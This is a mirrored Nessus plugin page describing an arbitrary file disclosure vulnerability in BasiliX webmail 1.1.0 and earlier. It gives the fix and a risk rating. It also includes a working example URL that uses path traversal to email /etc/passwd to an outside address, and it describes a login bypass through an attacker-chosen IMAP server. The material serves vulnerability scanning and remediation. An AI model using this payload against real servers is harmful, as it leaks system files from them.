Nessus Plugin #14305
Plugin Index
Note: This file has been created from a
downloaded version of the Nessus Plugins
from
http://www.nessus.org/.
Therefore, the information here can be outdated.
BasiliX Arbitrary File Disclosure Vulnerability
- Family:
- Remote file access
- Category:
- infos
- Copyright:
- This script is Copyright (C) 2004 George A. Theall
- Summary:
- Checks for Arbitrary File Disclosure Vulnerability in BasiliX
- Version:
- $Revision: 1.7 $
- Cve_id:
- -
- Bugtraq_id:
- 5062
- Xrefs:
- -
- Description:
The target is running at least one instance of BasiliX whose version
number is 1.1.0 or lower. Such versions allow retrieval of arbitrary
files that are accessible to the web server user when sending a
message since (1) they accept a list of attachment names from the
client and (2) they do not verify that attachments were in fact
uploaded.
For example, assuming you have logged in and accepted the requisite
cookies, opening a URL like the following would likely cause
/etc/passwd to be sent to you@example.com :
http://target/basilix/basilix.php?RequestID=CMPSSEND
&is_js=1.4
&cmps_from=Me
&cmps_to=you@example.com
&cmps_body=Here%20is%20the%20file%20you%20requested.
&cmps_f0=../../../../../etc/passwd
Further, since these versions do not sanitize input to login.php3,
it's possible for an attacker to establish a session on the target
without otherwise having access there by authenticating against an
IMAP server of his or her choosing.
***** Nessus has determined the vulnerability exists on the target
***** simply by looking at the version number(s) of BasiliX
***** installed there.
Solution : Upgrade to BasiliX version 1.1.1 or later.
Risk factor : Medium
Generiert am 27.04.2005 um 18:49:54 Uhr.